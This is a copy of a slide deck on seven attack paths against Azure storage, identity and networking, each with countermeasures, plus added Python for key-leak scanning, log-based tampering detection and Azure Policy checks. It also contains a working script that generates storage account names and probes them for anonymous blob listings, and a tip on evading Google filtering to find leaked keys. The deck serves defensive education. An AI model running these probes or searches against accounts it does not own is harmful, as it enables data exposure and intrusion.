Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 

7 Ways To Cyberattack And Hack Azure

Content
1.0 Think Like A Hacker
1.1 Introduction
1.2 Hacker Perspective
1.3 The Top Most Dangerous Cyberattacks
1.4 Account Storage – Architecture
1.5 Account Storage – Storage Stamp
2.0 Cyberattacks and Countermeasures
2.1 Attack01 – Access using account keys
2.2 Attack02 – Ransomware attack and encryption
2.3 Attack03 – Attack VMs and Disks
2.4 Attack04 – Storage Tampering attack
2.5 Attack05 – A Phishing attack
2.6 Attack06 – Attack to Blob and resource using anonymous access
2.7 Attack07 – Attacks To The Public and Private IP Addresses in Azure
3.0 Final Thoughts
3.1 Considerations & Best Practices
1.0 Think Like A Hacker…
“Everything and anything is hackable and vulnerable in some way.”
1.1 Introduction
• Microsoft Azure offers many tools and technologies to manage threats and security: the classical firewall, encryption, network security groups, MOMS, Security Centre, audit logging, GDPR compliance features and much more.
• To identify the most important risks and threats, and how to manage them, we need to choose the platform that provides the best features and tools.
• In the cloud any resource can be linked to security or become a target for hacking, and it should be assessed for vulnerabilities. Therefore a few basic questions should always be asked:
• Is the functionality secure or vulnerable?
• If vulnerable, how can it be exploited and how much damage could it cause?
1.2 Hacker Perspective (1/2)
• From a hacker's perspective the DNS name of a storage endpoint carries very important data, including the following:
• The account name is extremely important because Azure uses it to locate the primary storage cluster and the datacentre where the storage lives; all requests for this account are directed to that location. An application can use a different account for each location.
• The partition name identifies the storage node within the cluster and is used to scale out access to the data; the object name identifies the specific object within the partition. Transactions are atomic across the different objects that share the same partition name.
1.2 Hacker Perspective (2/2)
• The storage account architecture is organized to provide maximum capacity and scale; let us look at the most important components and how they work.
• A Storage Stamp is a cluster of N racks of storage nodes, each rack being a separate fault domain. The challenge is to keep the storage provisioned in production as highly utilized as possible: stamps are kept at around 70% utilization, and when a stamp reaches that level the Location Service migrates accounts to another stamp.
• The Location Service manages the account namespace across all storage stamps and is also responsible for disaster recovery and load balancing. The LS updates DNS so that requests for https://AccountName.service.core.windows.net are directed to that storage stamp's virtual IP (VIP, an IP address the storage stamp exposes for external traffic).
1.3 The Top Most Dangerous Cyberattacks (1/2)
• There are three essential areas in Microsoft Azure: RBAC, Storage and Networking. Everything in Azure depends on these three pillars, and considering these areas the three most dangerous cyberattacks are:
• Privilege escalation to Azure PIM and the Global Administrator account;
• Ransomware attack;
• Attack on the public and private IP addresses.
• All these attacks are extremely dangerous and effective. However, privilege escalation is the most dangerous because it can escalate to the top level, which means losing control of the entire cloud estate and the company.
• Internal attacks are much more dangerous and effective than external ones, and companies often underestimate that. Cloud is more secure than on-premises, because we can rely on a much more solid infrastructure, but we know the cloud has weaknesses.
1.3 The Top Most Dangerous Cyberattacks (2/2)
• RBAC is used to grant a specific user access to a storage account; this is the classic method people use to manage storage accounts through the Azure Portal, and hackers abuse the same mechanism to obtain access to storage accounts.
• The three major areas of Azure are also its weak points, the most critical and vulnerable areas for hackers to exploit:
• Authentication and Authorization (Azure AD and RBAC),
• Microsoft Azure Storage,
• Networks (Azure infrastructure).
1.4 Account Storage – Architecture
[Diagram: access to Blobs, Tables and Queues for accounts. A request to https://AccountName.service.core.windows.net is resolved through DNS, which the Location Service (with Account Management) keeps pointed at a Storage Stamp VIP. Each Storage Stamp contains Front-Ends and the Partition and Stream layers with Intra-Stamp Replication; Inter-Stamp Replication runs between stamps.]
1.5 Account Storage – Storage Stamps
• The three layers in a Storage Stamp:
• The Stream Layer is like a distributed file system within the stamp: it understands files, called streams, and manages how to store and replicate them, but it has no knowledge of the data or its semantics.
• The Partition Layer manages and understands the higher-level data abstractions (Blob, Table, Queue and Files), caches objects and stores them on top of the Stream Layer.
• The Front-End Layer handles authentication and authorization for the account through SAS tokens or access keys, and governs the relationship between the account and its partitions.
2.1 Attack01 – Access Using Account Keys
Attack
• Developers use account keys everywhere: they send them by email, write them in code and often take notes in files, and there are different techniques to find them.
• Google Dorks are used by hackers to collect any type of information on the internet; it is a very powerful technique, especially when used in a smart way.
• The query searches the whole Google index for any file of type config containing the word accountkey on the web sites githup.com and sourceforge.net.
• githup is not a typo: Google may filter some query types, and this spelling is used to evade the filter.
Countermeasures
• Create an Azure Policy to block any unauthorized key vault creation (use a dedicated AD group/user).
• Grant least-privilege permissions on the Key Vault, monitor every access and notify by email on any change.
• Store all sensitive information in Key Vaults and make developers follow this practice.
• Run automated source code scanning in Azure DevOps. A key that has already leaked must also be regenerated: finding it does not revoke it.
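The automated source-code scan recommended above, reduced to a stand-alone function. This is an added example and not code from the deck. It assumes a leaked storage account key appears either inside a connection string (AccountName=...;AccountKey=...) or as a bare 88-character base64 value, which is the format Azure uses for its 64-byte account keys; the file contents scanned here are constructed test data, and the key itself is generated from a fixed byte sequence so the example runs offline.

```python
"""Find Azure Storage account keys leaked into source and config files."""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Azure Storage account keys are 64 random bytes encoded as base64:
# 86 base64 characters followed by "==" padding (88 characters total).
ACCOUNT_KEY_RE = re.compile(r"AccountKey=([A-Za-z0-9+/]{86}==)", re.IGNORECASE)
ACCOUNT_NAME_RE = re.compile(r"AccountName=([a-z0-9]{3,24})", re.IGNORECASE)
# A key pasted on its own (notes, scripts) without the connection-string prefix.
BARE_KEY_RE = re.compile(r"(?<![A-Za-z0-9+/])([A-Za-z0-9+/]{86}==)(?![A-Za-z0-9+/=])")


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    account: Optional[str]
    key_fingerprint: str  # identifies the key in a report without re-leaking it


def fingerprint(key: str) -> str:
    return f"{key[:4]}...{key[-6:]}"


def is_plausible_key(value: str) -> bool:
    """Reject placeholders such as 'xxxx...==': a real key decodes to exactly
    64 bytes and is not made of a handful of repeated characters."""
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:
        return False
    return len(raw) == 64 and len(set(value[:86])) > 8


def scan_text(path: str, text: str) -> List[Finding]:
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        name_match = ACCOUNT_NAME_RE.search(line)
        account = name_match.group(1).lower() if name_match else None
        seen = set()  # the same key may match both patterns on one line
        for pattern in (ACCOUNT_KEY_RE, BARE_KEY_RE):
            for km in pattern.finditer(line):
                key = km.group(1)
                if key in seen or not is_plausible_key(key):
                    continue
                seen.add(key)
                findings.append(Finding(path, lineno, account, fingerprint(key)))
    return findings


def scan_files(files: Dict[str, str]) -> List[Finding]:
    out: List[Finding] = []
    for path, text in files.items():
        out.extend(scan_text(path, text))
    return out


# Constructed sample: a deterministic 64-byte "key" so the example runs offline.
SAMPLE_KEY = base64.b64encode(bytes(range(64))).decode()
SAMPLE_FILES = {
    "web.config": (
        '<add key="Storage" value="DefaultEndpointsProtocol=https;'
        f'AccountName=contosodata;AccountKey={SAMPLE_KEY};'
        'EndpointSuffix=core.windows.net" />\n'
        '<add key="Placeholder" value="AccountKey=' + "x" * 86 + '==" />\n'
    ),
    "notes.txt": f"prod key (do not share): {SAMPLE_KEY}\n",
    "README.md": "Set AZURE_STORAGE_KEY in Key Vault, never in this repo.\n",
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f.path}:{f.line} account={f.account} key={f.key_fingerprint}")
```

Run as a pre-commit hook or in the build pipeline over the repository tree; the placeholder on the second line of web.config is deliberately skipped so that documentation examples do not drown real findings.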
2.2 Attack02 – Ransomware Attack And Encryption
Attack
• Azure encrypts all data in a storage account at rest, a key requirement for certifications such as ISO 27001 and ISO 9001 and for GDPR. But is there a real risk of a ransomware attack in the cloud? The answer is yes. What can a hacker do? Potentially the entire storage account, all virtual machines and all disks can be made unreadable.
• A hacker could achieve a privilege escalation attack on the cloud, or find the account keys and gain access to the storage account. Once this is achieved the hacker has different choices. One quick and very dangerous attack targets the encryption keys: because the data is already encrypted, an attacker who deletes or disables the key makes the whole storage account unreadable, which has the same effect as ransomware encryption. Azure uses two mechanisms to encrypt the data:
• one using an internal, platform-managed encryption key;
• the other using a customer-managed key created by the customer and kept in Key Vault.
• Attack simulation on the encryption keys: the hacker only needs basic knowledge of Storage Account and Key Vault, and can:
• execute a privilege escalation attack on Azure (Contributor access to the resource group is required);
• enter the Key Vault and delete the key.
2.2 Attack02 – Ransomware Attack And Encryption
Countermeasures
• The best option is to use policies and block any unauthorized usage, especially creation.
• Create an Azure Policy to block any unauthorized key vault creation (use a dedicated AD group/user).
• Grant least-privilege permissions on the Key Vault, monitor every access and notify by email on any change.
• Keep Key Vault soft-delete and purge protection enabled, so that a deleted key can be recovered during the retention period instead of being lost for good.
• Use Multi-Factor Authentication in any sensitive location of the company.
2.3 Attack03 – Attack VMs And Disks
Attack
• Another option is encrypting the content of the storage account, for example all disks; this is a procedure that can be carried out remotely with PowerShell.
Countermeasures
• Create an Azure Policy to block any unauthorized encryption operation (use a dedicated AD group/user).
• Grant least-privilege permissions on the resources.
• Use Multi-Factor Authentication in any sensitive location of the company.
2.4 Attack04 – Storage Tampering Attack
Attack
• This is an extremely effective and dangerous attack: the hacker has found the storage account keys and scans the account, for example by listing the blobs with the Azure CLI.
• The attacker now has a clear idea of the content and may inject specific malicious content into the storage account: malicious scripts, tampered PDF files and more.
• Developers and IT administrators use queues to execute specific infrastructure tasks in FIFO order; the hacker could inject messages into the queue and have arbitrary code and scripts executed.
• This Azure storage tampering is usually used in conjunction with a phishing attack.
2.4 Attack04 – Storage Tampering Attack
Countermeasures
• Prevention is the best countermeasure: we must prevent access to the resource.
• Create an Azure Policy to block any unauthorized usage (use a dedicated AD group/user).
• Grant least-privilege permissions on the storage account and on the specific resource, monitor every access and notify by email on any change.
• Refer to Attack01 regarding the protection of the keys.
• Use Multi-Factor Authentication in any sensitive location of the company.
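The monitoring the countermeasures call for, written as detection logic over storage resource logs. This is an added example, not code from the deck. It models the Attack04 sequence described above (a caller holding the account key lists the account and then writes blobs or queue messages) as two rules: a write or delete authenticated with the shared account key or anonymously, or from an IP outside an allow-list; and a listing operation followed within a short window by a write from the same IP. Assumptions: the field names (time, operationName, callerIpAddress, identity.type, uri) follow the Azure Storage resource-log JSON schema, with authentication types such as "Account Key", "SAS Key", "OAuth" and "Anonymous" normalised before comparison; the log lines, the allow-listed network and the account name are constructed for the example.

```python
"""Detect tampering patterns in Azure Storage resource logs (JSON lines)."""
import ipaddress
import json
from datetime import datetime, timedelta

WRITE_OPS = {"PutBlob", "PutBlock", "PutBlockList", "PutPage", "DeleteBlob",
             "CopyBlob", "SetContainerACL", "PutMessage"}
RECON_OPS = {"ListBlobs", "ListContainers", "ListQueues", "PeekMessages"}
RISKY_AUTH = {"accountkey", "anonymous"}   # shared key or no identity at all
RECON_WINDOW = timedelta(minutes=15)

# Constructed allow-list: the application's own egress range (assumption).
ALLOWED_NETS = [ipaddress.ip_network("10.20.0.0/16")]


def caller_ip(record):
    # callerIpAddress is logged as "ip:port"
    return record["callerIpAddress"].rsplit(":", 1)[0]


def auth_kind(record):
    # "Account Key" / "SAS Key" / "OAuth" / "Anonymous" -> "accountkey", ...
    return record.get("identity", {}).get("type", "").replace(" ", "").lower()


def ip_allowed(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ALLOWED_NETS)


def parse_time(record):
    return datetime.fromisoformat(record["time"].replace("Z", "+00:00"))


def detect(lines):
    """Return (rule, caller_ip, operationName, uri) alerts, oldest first."""
    records = sorted((json.loads(l) for l in lines if l.strip()), key=parse_time)
    alerts = []
    last_recon = {}  # caller ip -> time of its most recent listing call
    for r in records:
        ip, op = caller_ip(r), r["operationName"]
        if op in RECON_OPS:
            last_recon[ip] = parse_time(r)
            continue
        if op not in WRITE_OPS:
            continue
        if auth_kind(r) in RISKY_AUTH or not ip_allowed(ip):
            alerts.append(("risky-write", ip, op, r.get("uri", "")))
        if ip in last_recon and parse_time(r) - last_recon[ip] <= RECON_WINDOW:
            alerts.append(("recon-then-write", ip, op, r.get("uri", "")))
    return alerts


def _rec(time, op, ip, auth, uri):
    return json.dumps({"time": time, "operationName": op, "callerIpAddress": ip,
                       "identity": {"type": auth}, "uri": uri})


BLOB = "https://contosodata.blob.core.windows.net"
QUEUE = "https://contosodata.queue.core.windows.net"
# Constructed log lines, deliberately out of time order.
SAMPLE_LOG = [
    _rec("2024-03-01T10:00:00Z", "ListBlobs", "203.0.113.7:443", "Account Key",
         f"{BLOB}/public?restype=container&comp=list"),
    _rec("2024-03-01T10:03:00Z", "PutBlob", "203.0.113.7:443", "Account Key",
         f"{BLOB}/public/invoice.pdf"),
    _rec("2024-03-01T10:04:00Z", "PutMessage", "203.0.113.7:443", "Account Key",
         f"{QUEUE}/deploy-tasks/messages"),
    _rec("2024-03-01T10:05:00Z", "PutBlob", "10.20.4.8:51022", "OAuth",
         f"{BLOB}/app/release.zip"),
    _rec("2024-03-01T10:06:00Z", "GetBlob", "198.51.100.2:443", "Anonymous",
         f"{BLOB}/public/invoice.pdf"),
    _rec("2024-03-01T09:00:00Z", "PutBlob", "10.20.4.9:50112", "Account Key",
         f"{BLOB}/app/config.json"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The OAuth write from the allow-listed range produces nothing, the key-based write from inside the network is still reported (it is the key use, not the source, that matters), and the external caller's listing followed by a blob upload and a queue message yields both rules.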
2.5 Attack05 – A Phishing Attack
Attack
• This attack is widely used because it can be combined with many other techniques; the concept is very simple.
• … trusted web site, the attacker can send email using this URL without being intercepted or blocked, and it looks like a legitimate URL. The hacker can simulate an internal communication, and an employee could click on the URL and open a malicious file hosted in the blob.
• This is a very simple example; in the future we will examine some nasty phishing attacks using a blob storage account.
Countermeasures
• Robust email security solutions are the best option, including filtering any email containing the windows.net domain.
• Educate employees to recognize the different types of phishing attack and to avoid clicking links.
• Use multiple security layers: email scanning, antivirus, and a red team to test malicious attacks.
• Educate everybody in the company, including the very top management.
• Use Multi-Factor Authentication in any sensitive location of the company.
2.6 Attack06 – Attack To Blob And Resource Using Anonymous Access
Attack
• We can set the read access level of a container and its blobs to anonymous. We may need this setting to provide public access to our content; hackers use the same setting for phishing attacks.
• Black hats scan the public internet daily and check the contents of these blobs by:
• Option 1 – Using Shodan: log in with a free account on Shodan.io and use the appropriate search string.
• Option 2 – Using scripting: this is the most productive and effective way to collect anonymous blob storages; any scripting technique works, and the concept is quite simple.
• On an HTTP GET, an anonymous blob container responds differently from a private one; this is the discriminant.
• A program or script generates every possible combination of account name and checks whether a public blob exists on the internet. The procedure is a simple representation of what criminal organizations do with very high computing power.
• The programs these organizations use are specifically designed to check the content, and they use artificial intelligence to quickly work out whether the content is useful or not.
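The scripted approach (Option 2) in concrete form, as an added example rather than the deck's own script. It generates candidate account names from a word list (a dictionary sweep in place of the exhaustive enumeration described above), builds the anonymous container-listing URL, and classifies the response: the discriminant is that only a public container answers an unauthenticated GET with HTTP 200 and an EnumerationResults XML body, while a private one returns a 4xx error and a non-existent account name does not resolve at all. Assumptions: the URL shape https://{account}.blob.core.windows.net/{container}?restype=container&comp=list is the public Blob REST listing endpoint; the account names, container names and responses used in the demo are constructed, and only probe() touches the network (use it against accounts you own).

```python
"""Candidate account names and the public/private discriminant for Blob storage."""
import itertools
import re
import socket
import urllib.error
import urllib.request

# Storage account names: 3-24 lowercase letters and digits, globally unique.
ACCOUNT_NAME_RE = re.compile(r"^[a-z0-9]{3,24}$")


def valid_account_name(name):
    return bool(ACCOUNT_NAME_RE.match(name))


def candidate_names(words, suffixes=("", "data", "prod", "dev", "backup", "public")):
    """Dictionary-style generation: company word + environment suffix + optional digits."""
    out = []
    for w, s, d in itertools.product(words, suffixes, ("", "1", "01", "2")):
        name = f"{w}{s}{d}".lower()
        if valid_account_name(name) and name not in out:
            out.append(name)
    return out


def container_url(account, container):
    return f"https://{account}.blob.core.windows.net/{container}?restype=container&comp=list"


def classify(status, body):
    """The discriminant. None status: the name did not resolve (or the network
    failed); 200 with a listing: anonymous container enumeration is allowed;
    any other status: the account exists but the container is private or absent."""
    if status is None:
        return "no-such-account"
    if status == 200 and "<EnumerationResults" in body:
        return "public-listing"
    if status == 200:
        return "public-blob"
    return "private-or-missing"


def probe(account, container, timeout=5):
    """Live check over the network; returns classify() of the anonymous GET."""
    try:
        with urllib.request.urlopen(container_url(account, container), timeout=timeout) as r:
            return classify(r.status, r.read(4096).decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:
        return classify(e.code, "")
    except (urllib.error.URLError, socket.gaierror, socket.timeout):
        return classify(None, "")


def sweep(responses):
    """Classify a batch of (account, container) -> (status, body) results."""
    return {f"{a}/{c}": classify(status, body) for (a, c), (status, body) in responses.items()}


# Constructed responses standing in for what probe() would return.
SAMPLE_RESPONSES = {
    ("contosopublic", "$web"): (200, '<?xml version="1.0" encoding="utf-8"?>'
                                     '<EnumerationResults><Blobs><Blob><Name>index.html'
                                     '</Name></Blob></Blobs></EnumerationResults>'),
    ("contosodata", "backups"): (404, ""),
    ("contosoxyz123", "files"): (None, ""),
}

if __name__ == "__main__":
    print(candidate_names(["contoso"])[:6])
    for target, verdict in sweep(SAMPLE_RESPONSES).items():
        print(target, verdict)
```

The same sweep run by the owner over their own account names is the cheapest way to find containers that were made public by mistake, which is the countermeasure the next slide asks for.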
2.6 Attack06 – Attack To Blob And Resource Using Anonymous Access
Countermeasures
• Don't publish any sensitive information in public storage, and disable anonymous access at the storage-account level wherever it is not needed, so that no container can be made public by mistake.
Important Note
• Public blobs can make a good honey trap: criminals will focus on that specific area of attack, and you can also plant false and misleading information there.
• The honey trap is an interesting strategy and can be extremely effective if well planned; it lets us make the criminal believe what we want and discourage them from investigating the company any further.
2.7 Attack07 – Attacks To The Public And Private IP Addresses In Azure
Attack
• A public IP is attacked within the first five minutes of its life on the internet; this is standard procedure for criminal organizations looking for information to use against the company and its employees. Public IPs exposed in Azure are very easy to find: the entire Azure infrastructure can be scanned for public IPs and open RDP ports with a single command, because a hacker can download the whole Azure IP range and scan it; this is all public information.
• Never underestimate internal threats: if a hacker penetrates a VM he also gains access to the internal network, at least the subnet, and if the VM is domain-joined the scale of the damage cannot be measured; it depends on the hacker's Azure experience.
Countermeasures
• Option 1 – The basic solution is to avoid public IPs; if you really need one, lock it down and masquerade it.
• Option 2 – Control the creation of new public IPs.
• Option 3 – Use Azure Bastion.
• Option 4 – Use a VPN.
• VPN is the best option because we avoid exposure to the internet; however, we still need to manage the private IPs because we can face an internal attack.
3.1 Considerations & Best Practices
• Centralize security control and access using a good subscription structure and a firewall appliance.
• Create a base subscription, install ExpressRoute and the firewall there, and propagate connectivity to the other subscriptions; this gives you a lot of control.
• Segment the network properly and organize your IP schemas and VNets by region.
• Create Azure Policies and enforce your network rules.
• Use a Zero Trust approach and limit all access.
• This presentation has highlighted some of the most important and dangerous attacks on the Storage Account. Prevention is always the best practice, and to achieve it we need to use Azure Policies.
• Azure Policies are the first line of defense, the first opportunity to stop the attack. This is what we need to achieve: stop the attack at the beginning, not while it is in progress.
• The most dangerous attacks always start from the inside; we need to make our own house secure against any risk.
• Don't trust anybody, even yourself: if you are not sure about something, ask and discuss it with the team.
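Azure Policy is the control this deck keeps returning to (Attack02, Attack06, Attack07 and the closing slide), so here is what such policies look like, as an added example and not material from the deck. The three rules are written in the Azure Policy definition grammar (allOf / field / equals / notEquals / not): deny a Key Vault without purge protection (the ransomware case), deny a storage account that allows anonymous blob access, and deny creation of any public IP address. The evaluator beneath them is a simplified model of how the service matches a rule against a resource, written for this example only; it is not the Azure Policy engine. Assumed aliases are Microsoft.KeyVault/vaults/enablePurgeProtection and Microsoft.Storage/storageAccounts/allowBlobPublicAccess, and the resource documents it evaluates are constructed.

```python
"""Three Azure Policy deny rules and a miniature evaluator to exercise them."""

DENY_KEYVAULT_WITHOUT_PURGE_PROTECTION = {
    "if": {"allOf": [
        {"field": "type", "equals": "Microsoft.KeyVault/vaults"},
        # "not equals true" (rather than "equals false") also catches a vault
        # that omits the property altogether.
        {"not": {"field": "Microsoft.KeyVault/vaults/enablePurgeProtection",
                 "equals": "true"}},
    ]},
    "then": {"effect": "deny"},
}
DENY_PUBLIC_BLOB_ACCESS = {
    "if": {"allOf": [
        {"field": "type", "equals": "Microsoft.Storage/storageAccounts"},
        {"field": "Microsoft.Storage/storageAccounts/allowBlobPublicAccess",
         "notEquals": "false"},
    ]},
    "then": {"effect": "deny"},
}
DENY_PUBLIC_IP_CREATION = {
    "if": {"field": "type", "equals": "Microsoft.Network/publicIPAddresses"},
    "then": {"effect": "deny"},
}
POLICIES = {
    "deny-keyvault-without-purge-protection": DENY_KEYVAULT_WITHOUT_PURGE_PROTECTION,
    "deny-public-blob-access": DENY_PUBLIC_BLOB_ACCESS,
    "deny-public-ip-creation": DENY_PUBLIC_IP_CREATION,
}


def resolve_field(resource, field):
    """'type'/'name'/'location'/'kind' are top-level keys; an alias of the form
    '<resource type>/<property>' reads resource['properties'][<property>]."""
    if field in ("type", "name", "location", "kind"):
        return resource.get(field)
    prop = field.rsplit("/", 1)[1]
    return resource.get("properties", {}).get(prop)


def _norm(value):
    # Azure Policy compares case-insensitively; booleans are written as strings.
    if value is None:
        return None
    return str(value).lower()


def matches(cond, resource):
    if "allOf" in cond:
        return all(matches(c, resource) for c in cond["allOf"])
    if "anyOf" in cond:
        return any(matches(c, resource) for c in cond["anyOf"])
    if "not" in cond:
        return not matches(cond["not"], resource)
    value = _norm(resolve_field(resource, cond["field"]))
    if "equals" in cond:
        return value == _norm(cond["equals"])
    if "notEquals" in cond:
        return value != _norm(cond["notEquals"])
    if "exists" in cond:
        return (value is not None) == (_norm(cond["exists"]) == "true")
    raise ValueError(f"unsupported condition: {cond}")


def evaluate(resource, policies=POLICIES):
    """Names of the policies whose deny effect would block this deployment."""
    return [name for name, rule in policies.items()
            if rule["then"]["effect"] == "deny" and matches(rule["if"], resource)]


def audit_all(resources, policies=POLICIES):
    return {r["name"]: evaluate(r, policies) for r in resources}


# Constructed resource definitions, as an ARM deployment would present them.
SAMPLE_RESOURCES = [
    {"name": "kv-prod", "type": "Microsoft.KeyVault/vaults",
     "properties": {"enableSoftDelete": True, "enablePurgeProtection": True}},
    {"name": "kv-dev", "type": "Microsoft.KeyVault/vaults",
     "properties": {"enableSoftDelete": True}},  # purge protection omitted
    {"name": "contosodata", "type": "Microsoft.Storage/storageAccounts",
     "properties": {"allowBlobPublicAccess": False}},
    {"name": "contosopublic", "type": "Microsoft.Storage/storageAccounts",
     "properties": {}},  # property omitted, so the rule cannot see it set to false
    {"name": "vm1-pip", "type": "Microsoft.Network/publicIPAddresses",
     "properties": {"publicIPAllocationMethod": "Static"}},
]

if __name__ == "__main__":
    for name, denied_by in audit_all(SAMPLE_RESOURCES).items():
        print(f"{name}: {'allowed' if not denied_by else 'DENIED by ' + ', '.join(denied_by)}")
```

Two resources pass and three are denied; note that kv-dev and contosopublic are blocked not because they set an unsafe value but because they leave the property out, which is why the rules are phrased as "not equals the safe value" rather than "equals the unsafe one".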
END OF DECK – By Abdul Khan – https://www.linkedin.com/in/abdul-khan-uk/